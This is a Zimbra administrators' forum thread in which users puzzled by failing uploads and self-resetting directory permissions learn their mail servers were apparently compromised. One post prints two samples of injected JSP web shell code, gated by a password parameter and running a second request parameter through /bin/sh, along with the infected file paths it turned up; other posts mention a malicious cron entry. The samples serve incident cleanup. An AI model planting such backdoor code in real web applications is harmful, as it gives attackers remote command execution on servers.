Cannot upload some files regardless of size or extension

Discuss your pilot or production implementation with other Zimbra admins or our engineers.
ferra
Advanced member
Advanced member
Posts: 105
Joined: Fri Sep 12, 2014 10:47 pm

Re: Cannot upload some files regardless of size or extension

Postby ferra » Mon May 27, 2019 4:36 pm

Ok, the script was started from the zimbra crontab

Just deleted

I keep whatching


achilles286anil
Posts: 4
Joined: Sun Oct 29, 2017 9:45 am

Re: Cannot upload some files regardless of size or extension

Postby achilles286anil » Tue May 28, 2019 2:00 am

Changing /opt/zimbra/data/tmp and upload permission to 755 worked but whenever i delete the crontab -e -u zimbra data. It keeps on rewriting its self. Can one advice me where cud be the script which rewrites crontab.

Sent from my SM-G950F using Tapatalk
MaySky
Posts: 24
Joined: Sat Apr 02, 2016 6:57 am

Re: Cannot upload some files regardless of size or extension

Postby MaySky » Tue May 28, 2019 8:06 am

The situation depends on many things, so there is no silver bullet.
Read viewtopic.php?f=15&t=65932 and do what fits to yours.
LunaticRV
Posts: 3
Joined: Fri Feb 01, 2019 12:43 pm

Re: Cannot upload some files regardless of size or extension

Postby LunaticRV » Tue May 28, 2019 8:51 am

DualBoot wrote:Hello,

maybe your server has been compromised.

Regards,


Unfortunately yes,

What I did is to check not only cron, sh files and logs but also entire java and jsp files. Probably still not many know that there is also another set of code injected on java files aswell.

When I checked jsp and java files esepcially contains getRuntime() and .exec there are few more than reported before;

Sample injected java code #1:

Code: Select all

if   (
"Ll0A_3kPJObGaVu0tniREpEpIXMhVMFGqN5prfydEp8"
.equals(   request.getParameter(   "p"   +
"pwd"    )
) )
{
java.io.InputStream   jkLgW
=
Runtime.getRuntime()
.exec
(  new   String[]  {
"/bin" +  "/sh"
  ,
"-c"
,  request.getParameter(   "p"  +
"com"
 ) }  ) .getInputStream()
;  int EEnhrG  =
-1
;   byte[]   UcsaD   = new  byte[
98   ]
; out.print( "<pr"
+
"e>"   
) ;
while(  (
EEnhrG   =
jkLgW.read(
UcsaD   )   ) !=
-1 ) {
out.print(   new   String(  UcsaD,
0,
EEnhrG )   )
;
}  out.print(   "</pr"  +
"e>"
   )
;
}


Sample injected java code #2:

Code: Select all

if("LVdpVsmayetL6cvL2YToniYg".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.print(new String(b,a));}out.print("</pre>");}


Code: Select all

opt/zimbra/jetty/work/zimbra/org/apache/jsp/public_/Ajax_jsp.java:if("LVdpVsmayetL6cvL2YToniYg".equals(request.getParameter("ppwd"))){java.io.InputStream in = Runtime.getRuntime().exec(new String[]{"/bin/sh","-c", request.getParameter("pcom")}).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.print(new String(b,a));}out.print("</pre>");}
/opt/zimbra/jetty/work/zimbraAdmin/org/apache/jsp/public_/jsp/Debug_jsp.java:Runtime.getRuntime()
/opt/zimbra/jetty/webapps/zimbra/public/Ajax.jsp:Runtime.getRuntime()
/opt/zimbra/jetty/webapps/zimbraAdmin/public/jsp/Debug.jsp:Runtime.getRuntime()
/opt/zimbra/jetty/webapps/service/error/403.jsp:Runtime.getRuntime() .exec   (   new String[]


So better migrate whole data to new server is better, but if you want to check everything; download whatever zimbra version you have, extract zimbra-store deb file and compare diff jetty with your own jetty folder. Suspicious codes will like to be seen clearly.
sersh
Posts: 2
Joined: Thu May 30, 2019 5:23 am

Re: Cannot upload some files regardless of size or extension

Postby sersh » Thu May 30, 2019 5:33 am

Hello

I have faced same problem pdf can't upoads. My folder /opt/zimbra/data/tmp/upload has permissions 0555.
When I set permission 0755 for this folder I can attach pdf, but wrong permission is set again.
I have changed owner for this folder to root:zimbra and set permission to 0770. It works for me.
Now I can attach all types of files.
phoenix
Ambassador
Ambassador
Posts: 26347
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: Cannot upload some files regardless of size or extension

Postby phoenix » Thu May 30, 2019 6:00 am

sersh wrote:Hello

I have faced same problem pdf can't upoads. My folder /opt/zimbra/data/tmp/upload has permissions 0555.
When I set permission 0755 for this folder I can attach pdf, but wrong permission is set again.
I have changed owner for this folder to root:zimbra and set permission to 0770. It works for me.
Now I can attach all types of files.
Very good but this is not a permissions problem. The likelihood is that your Zimbra server has been compromised, you'd understand that if you read this (and other) forum thread.
Regards

Bill

Rspamd: A high performance spamassassin replacement

If you'd like to see this implemented in a future version of ZCS then please vote on Bugzilla entries 97706 & 108168
sersh
Posts: 2
Joined: Thu May 30, 2019 5:23 am

Re: Cannot upload some files regardless of size or extension

Postby sersh » Thu May 30, 2019 8:41 am

phoenix wrote:Very good but this is not a permissions problem. The likelihood is that your Zimbra server has been compromised, you'd understand that if you read this (and other) forum thread.


I see that and I found file /opt/zimbra/lib/zmlogswatch which change permission for path /opt/zimbra/data/tmp/upload. I have renamed this file and set owner for path to zimbra:zimbra and 0750 permissions.
While all ok. But somebody constantly add this file to /var/spool/cron/zimbra.
phoenix
Ambassador
Ambassador
Posts: 26347
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: Cannot upload some files regardless of size or extension

Postby phoenix » Thu May 30, 2019 1:40 pm

sersh wrote:I see that and I found file /opt/zimbra/lib/zmlogswatch which change permission for path /opt/zimbra/data/tmp/upload. I have renamed this file and set owner for path to zimbra:zimbra and 0750 permissions.
While all ok. But somebody constantly add this file to /var/spool/cron/zimbra.
You need to clean your hacked server, read the threads/posts that describe in detail how to do that.
Regards

Bill

Rspamd: A high performance spamassassin replacement

If you'd like to see this implemented in a future version of ZCS then please vote on Bugzilla entries 97706 & 108168
lip_fu
Posts: 1
Joined: Mon Jun 03, 2019 4:51 am

Re: Cannot upload some files regardless of size or extension

Postby lip_fu » Tue Jun 04, 2019 5:31 am

Hello,

After I do
chmod -R 750 /opt/zimbra/data/tmp/upload/
the permission changed to drwxr-x---
but after 1 second, it changed back to dr-xr-x---
Why ?
Thx.

zimbraargentina wrote:Hello
The solution is execute as root

chmod -R 750 /opt/zimbra/data/tmp/upload/

no restart required

Let me know
Regards

Marcos M
SDA
phoenix
Ambassador
Ambassador
Posts: 26347
Joined: Fri Sep 12, 2014 9:56 pm
Location: Liverpool, England

Re: Cannot upload some files regardless of size or extension

Postby phoenix » Tue Jun 04, 2019 9:26 am

lip_fu wrote:Why ?
For the simple reason that your server has most likely been hacked, did you not read my post immediately above yours? You need to clean your server, read some of the forum treads/posts on the topic.
Regards

Bill

Rspamd: A high performance spamassassin replacement

If you'd like to see this implemented in a future version of ZCS then please vote on Bugzilla entries 97706 & 108168

Return to “Administrators”

Who is online

Users browsing this forum: No registered users and 5 guests